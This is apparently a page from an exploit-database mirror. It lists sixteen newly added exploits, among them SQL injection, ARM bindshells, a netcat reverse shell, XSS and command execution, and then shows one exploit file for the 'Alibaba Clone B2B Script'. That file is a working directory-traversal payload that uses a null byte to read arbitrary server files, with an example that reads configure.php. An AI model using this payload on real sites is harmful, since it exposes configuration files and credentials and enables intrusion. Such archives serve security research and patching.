3739831fb2
16 new exploits Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability ImpressPages CMS 3.8 - Stored XSS Vulnerability Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability Linux Netcat Reverse Shell - 32bit - 77 bytes PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS Getsimple CMS 3.3.10 - Arbitrary File Upload op5 v7.1.9 Configuration Command Execution op5 7.1.9 - Configuration Command Execution Alibaba Clone B2B Script - Arbitrary File Disclosure XuezhuLi FileSharing - Directory Traversal XuezhuLi FileSharing - (Add User) CSRF FinderView - Multiple Vulnerabilities
13 lines
396 B
Text
Executable file
13 lines
396 B
Text
Executable file
# Exploit Title: Alibaba Clone B2B Script File Read Vulnerability
|
|
# Date: 2016-06-22
|
|
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
|
|
# Vendor Homepage: http://alibaba-clone.com/
|
|
# Version: All Versions
|
|
# Tested on: CentOS and Windows
|
|
|
|
Exploit :
|
|
http://site/show_page.php?page=../[FilePath]%00
|
|
|
|
Example :
|
|
http://site/show_page.php?page=../configure.php%00
|
|
|